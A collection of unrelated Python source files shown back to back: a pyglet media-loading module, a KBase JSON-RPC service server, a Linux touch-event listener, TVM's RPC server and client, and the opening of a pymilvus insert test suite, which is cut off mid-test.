`filename` : str
Filename of the media file to load.
`file` : file-like object
Not yet supported.
`streaming` : bool
If False, a `StaticSource` will be returned; otherwise (default) a
`StreamingSource` is created.
:rtype: `Source`
'''
source = get_source_loader().load(filename, file)
if not streaming:
source = StaticSource(source)
return source
def get_audio_driver():
global _audio_driver
if _audio_driver:
return _audio_driver
_audio_driver = None
for driver_name in fos.lib.pyglet.options['audio']:
try:
if driver_name == 'pulse':
from drivers import pulse
_audio_driver = pulse.create_audio_driver()
break
elif driver_name == 'openal':
from drivers import openal
_audio_driver = openal.create_audio_driver()
break
elif driver_name == 'directsound':
from drivers import directsound
_audio_driver = directsound.create_audio_driver()
break
elif driver_name == 'silent':
_audio_driver = get_silent_audio_driver()
break
except:
if _debug:
print 'Error importing driver %s' % driver_name
return _audio_driver
def get_silent_audio_driver():
global _silent_audio_driver
if not _silent_audio_driver:
from drivers import silent
_silent_audio_driver = silent.create_audio_driver()
return _silent_audio_driver
_audio_driver = None
_silent_audio_driver = None
def get_source_loader():
global _source_loader
if _source_loader:
return _source_loader
try:
import avbin
_source_loader = AVbinSourceLoader()
except ImportError:
_source_loader = RIFFSourceLoader()
return _source_loader
_source_loader = None
try:
import avbin
have_avbin = True
except ImportError:
have_avbin = False
|
prcontigfilterServer.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
import requests.packages.urllib3
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'prcontigfilter'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from prcontigfilter.prcontigfilterImpl import prcontigfilter
impl_prcontigfilter = prcontigfilter(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
async_run_methods['prcontigfilter.filter_contigs_async'] = ['prcontigfilter', 'filter_contigs']
async_check_methods['prcontigfilter.filter_contigs_check'] = ['prcontigfilter', 'filter_contigs']
sync_methods['prcontigfilter.filter_contigs'] = True
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
raise ValueError('Neither \'job-service-url\' parameter is defined in '+
'configuration nor \'KB_JOB_SERVICE_URL\' variable is defined in system')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'prcontigfilter'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_prcontigfilter.filter_contigs,
name='prcontigfilter.filter_contigs',
types=[dict])
self.method_authentication['prcontigfilter.filter_contigs'] = 'required'
self.auth_client = biokbase.nexus.Client(
config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"prcontigfilter but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user, _, _ = \
self.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
requests.packages.urllib3.disable_warnings()
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
win_touch_client.py
|
#!/usr/bin/python
import gtk, wnck
import os, time
import struct
TEST = False
class WinTouch(object):
def __init__(self, event_file):
self.__cb_obj = None
self.__des_file = event_file
self.__fmt = 'LLHHI'
self.__ev_type = 0x1
'''use ev_key = 0x110 to test, actually is 0x14a'''
if TEST:
self.__ev_key = 0x110
else:
self.__ev_key = 0x14a
'''ev_value 0x0 key up, 0x1 key down'''
self.__ev_value = 0x1
def register_listener(self, obj):
print "register_listener called"
self.__cb_obj = obj
def __touch_event(self,fd, raw):
(t_se, t_use, type, key, value) = struct.unpack(self.__fmt, raw)
if type == self.__ev_type and key == self.__ev_key and value == self.__ev_value:
print "time_sec:%d" % t_se + " time_usec:%x" % t_use + " type:%x" % type + " key:%x" % key + " value:%x" % value
if self.__cb_obj:
print "touch _cb_obj not none"
self.__cb_obj.on_screen_touched();
else:
print "touch _cb_obj none"
def __get_sudo(self):
import os, sys
args = ['sudo', sys.executable] + sys.argv + [os.environ]
# the next line replaces the currently-running process with the sudo
os.execlpe('sudo', *args)
def __check_sudo(self):
import os, sys
euid = os.geteuid()
while euid != 0:
self.__get_sudo()
print 'win_touch __check_sudo obtain root user'
time.sleep(2)
print 'Running. Your euid is', euid
def exec_touch_event(self):
while not os.path.exists(self.__des_file):
time.sleep(3)
print 'win_touch, open file:', self.__des_file
e_file = open(self.__des_file, 'rb')
read_size = struct.calcsize(self.__fmt)
while True:
try:
raw = e_file.read(read_size);
if not raw:
continue
self.__touch_event(e_file, raw)
except Exception, e:
print "touch_event loop excp: ", e.message
def exec_fork(self):
""" create pipe """
pr, pw = os.pipe()
""" for a process """
subProcessId = os.fork()
print " ************* do fork"
if (subProcessId == 0):
""" sub process do """
fork_function()
else:
""" main process do """
class TouchListener(object):
def on_screen_touched(self):
raise Exception("TouchListener.onScreenTouch should be override by sub class")
def run_touch_service(win_ctrl):
import threading
"""
for test
"""
if TEST:
touch_dev = os.path.join('/dev/input/by-path/', 'platform-i8042-serio-1-event-mouse')
winTouch = WinTouch(touch_dev)
else:
touch_dev = os.path.join('/dev/input/by-path/', 'pci-0000:00:1d.0-usb-0:1.1:1.0-event')
winTouch = WinTouch(touch_dev)
winTouch.register_listener(win_ctrl)
winTouchThr = threading.Thread(target=winTouch.exec_touch_event)
winTouchThr.start()
def fork_function():
while True:
print '-- fork_function--'
winTouch = WinTouch('/dev/input/event6')
winTouch.register_listener(None)
winTouch.exec_touch_event()
"""test"""
#run_touch_service(None)
|
rpc.py
|
"""RPC interface for easy testing.
RPC enables connect to a remote server, upload and launch functions.
This is useful to for cross-compile and remote testing,
The compiler stack runs on local server, while we use RPC server
to run on remote runtime which don't have a compiler available.
The test program compiles the program on local server,
upload and run remote RPC server, get the result back to verify correctness.
"""
from __future__ import absolute_import
import os
import socket
import struct
import logging
import multiprocessing
import subprocess
import time
from . import util, cc, tar
from ..module import load as _load_module
from .._ffi.function import _init_api, register_func
from .._ffi.ndarray import context as _context
from .._ffi.base import py_str
RPC_MAGIC = 0xff271
RPC_SESS_MASK = 128
def _server_env():
"""Server environment function return temp dir"""
temp = util.tempdir()
# pylint: disable=unused-variable
@register_func("tvm.contrib.rpc.server.workpath")
def get_workpath(path):
return temp.relpath(path)
@register_func("tvm.contrib.rpc.server.load_module", override=True)
def load_module(file_name):
"""Load module from remote side."""
path = temp.relpath(file_name)
# Try create a shared library in remote
if path.endswith(".o"):
logging.info("Create shared library based on %s", path)
cc.create_shared(path + ".so", path)
path += ".so"
elif path.endswith(".tar"):
tar_temp = util.tempdir()
tar.untar(path, tar_temp.temp_dir)
files = [tar_temp.relpath(x) for x in tar_temp.listdir()]
cc.create_shared(path + ".so", files)
path += ".so"
m = _load_module(path)
logging.info("load_module %s", path)
return m
return temp
def _serve_loop(sock, addr):
"""Server loop"""
sockfd = sock.fileno()
temp = _server_env()
_ServerLoop(sockfd)
temp.remove()
logging.info("Finish serving %s", addr)
def _recvall(sock, nbytes):
res = []
nread = 0
while nread < nbytes:
chunk = sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
return b"".join(res)
def _listen_loop(sock):
"""Lisenting loop"""
while True:
conn, addr = sock.accept()
logging.info("RPCServer: connection from %s", addr)
magic = struct.unpack("@i", _recvall(conn, 4))[0]
if magic != RPC_MAGIC:
conn.close()
continue
keylen = struct.unpack("@i", _recvall(conn, 4))[0]
key = py_str(_recvall(conn, keylen))
if not key.startswith("client:"):
conn.sendall(struct.pack("@i", RPC_MAGIC + 2))
else:
conn.sendall(struct.pack("@i", RPC_MAGIC))
logging.info("Connection from %s", addr)
process = multiprocessing.Process(target=_serve_loop, args=(conn, addr))
process.deamon = True
process.start()
# close from our side.
conn.close()
def _connect_proxy_loop(addr, key):
key = "server:" + key
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(addr)
sock.sendall(struct.pack("@i", RPC_MAGIC))
sock.sendall(struct.pack("@i", len(key)))
sock.sendall(key.encode("utf-8"))
magic = struct.unpack("@i", _recvall(sock, 4))[0]
if magic == RPC_MAGIC + 1:
raise RuntimeError("key: %s has already been used in proxy" % key)
elif magic == RPC_MAGIC + 2:
logging.info("RPCProxy do not have matching client key %s", key)
elif magic != RPC_MAGIC:
raise RuntimeError("%s is not RPC Proxy" % str(addr))
logging.info("RPCProxy connected to %s", str(addr))
process = multiprocessing.Process(target=_serve_loop, args=(sock, addr))
process.deamon = True
process.start()
process.join()
def _popen(cmd):
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
env=os.environ)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Server invoke error:\n"
msg += out
raise RuntimeError(msg)
class Server(object):
"""Start RPC server on a seperate process.
This is a simple python implementation based on multi-processing.
It is also possible to implement a similar C based sever with
TVM runtime which does not depend on the python.
Parameters
----------
host : str
The host url of the server.
port : int
The port to be bind to
port_end : int, optional
The end port to search
is_proxy : bool, optional
Whether the address specified is a proxy.
If this is true, the host and port actually corresponds to the
address of the proxy server.
use_popen : bool, optional
Whether to use Popen to start a fresh new process instead of fork.
This is recommended to switch on if we want to do local RPC demonstration
for GPU devices to avoid fork safety issues.
key : str, optional
The key used to identify the server in Proxy connection.
"""
def __init__(self,
host,
port=9091,
port_end=9199,
is_proxy=False,
use_popen=False,
key=""):
self.host = host
self.port = port
self.libs = []
if use_popen:
cmd = ["python",
"-m", "tvm.exec.rpc_server",
"--host=%s" % host,
"--port=%s" % port]
self.proc = multiprocessing.Process(
target=subprocess.check_call, args=(cmd,))
self.proc.deamon = True
self.proc.start()
time.sleep(1)
elif not is_proxy:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = None
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [98, 48]:
continue
else:
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
logging.info("RPCServer: bind to %s:%d", host, self.port)
sock.listen(1)
self.sock = sock
self.proc = multiprocessing.Process(
target=_listen_loop, args=(self.sock,))
self.proc.deamon = True
self.proc.start()
else:
self.proc = multiprocessing.Process(
target=_connect_proxy_loop, args=((host, port), key))
self.proc.deamon = True
self.proc.start()
def terminate(self):
"""Terminate the server process"""
if self.proc:
self.proc.terminate()
self.proc = None
def __del__(self):
self.terminate()
class RPCSession(object):
"""RPC Client session module
Do not directly create the obhect, call connect
"""
# pylint: disable=invalid-name
def __init__(self, sess):
self._sess = sess
self._tbl_index = _SessTableIndex(sess)
self._remote_funcs = {}
def get_function(self, name):
"""Get function from the session.
Parameters
----------
name : str
The name of the function
Returns
-------
f : Function
The result function.
"""
return self._sess.get_function(name)
def context(self, dev_type, dev_id=0):
"""Construct a remote context.
Parameters
----------
dev_type: int or str
dev_id: int, optional
Returns
-------
ctx: TVMContext
The corresponding encoded remote context.
"""
ctx = _context(dev_type, dev_id)
encode = (self._tbl_index + 1) * RPC_SESS_MASK
ctx.device_type += encode
ctx._rpc_sess = self
return ctx
def cpu(self, dev_id=0):
"""Construct remote CPU device."""
return self.context(1, dev_id)
def gpu(self, dev_id=0):
"""Construct remote GPU device."""
return self.context(2, dev_id)
def cl(self, dev_id=0):
"""Construct remote OpenCL device."""
return self.context(4, dev_id)
def metal(self, dev_id=0):
"""Construct remote Metal device."""
return self.context(8, dev_id)
def ext_dev(self, dev_id=0):
"""Construct remote extension device."""
return self.context(12, dev_id)
def upload(self, data, target=None):
"""Upload file to remote runtime temp folder
Parameters
----------
data : str or bytearray
The file name or binary in local to upload.
target : str, optional
The path in remote
"""
if isinstance(data, bytearray):
if not target:
raise ValueError("target must present when file is a bytearray")
blob = data
else:
blob = bytearray(open(data, "rb").read())
if not target:
target = os.path.basename(data)
if "upload" not in self._remote_funcs:
self._remote_funcs["upload"] = self.get_function(
"tvm.contrib.rpc.server.upload")
self._remote_funcs["upload"](target, blob)
def download(self, path):
"""Download file from remote temp folder.
Parameters
----------
path : str
The relative location to remote temp folder.
Returns
-------
blob : bytearray
The result blob from the file.
"""
if "download" not in self._remote_funcs:
self._remote_funcs["download"] = self.get_function(
"tvm.contrib.rpc.server.download")
return self._remote_funcs["download"](path)
def load_module(self, path):
"""Load a remote module, the file need to be uploaded first.
Parameters
----------
path : str
The relative location to remote temp folder.
Returns
-------
m : Module
The remote module containing remote function.
"""
return _LoadRemoteModule(self._sess, path)
def connect(url, port, key=""):
"""Connect to RPC Server
Parameters
----------
url : str
The url of the host
port : int
The port to connect to
key : str, optional
Additional key to match server
Returns
-------
sess : RPCSession
The connected session.
"""
try:
sess = _Connect(url, port, key)
except NameError:
raise RuntimeError("Please compile with USE_RPC=1")
return RPCSession(sess)
_init_api("tvm.contrib.rpc")
|
test_insert_20.py
|
import threading
import numpy as np
import pandas as pd
import pytest
from pymilvus import Index
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "insert"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
default_binary_index_params = {"index_type": "BIN_IVF_FLAT", "metric_type": "JACCARD", "params": {"nlist": 64}}
class TestInsertParams(TestcaseBase):
""" Test case of Insert interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_data_type(self, request):
if isinstance(request.param, list) or request.param is None:
pytest.skip("list and None type is valid data type")
yield request.param
@pytest.fixture(scope="module", params=ct.get_invalid_strs)
def get_invalid_field_name(self, request):
if isinstance(request.param, (list, dict)):
pytest.skip()
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dataframe_data(self):
"""
target: test insert DataFrame data
method: 1.create collection
2.insert dataframe data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_list_data(self):
"""
target: test insert list-like data
method: 1.create 2.insert list data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_non_data_type(self, get_non_data_type):
"""
target: test insert with non-dataframe, non-list data
method: insert with data (non-dataframe and non-list type)
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
error = {ct.err_code: 0, ct.err_msg: "Data type is not support"}
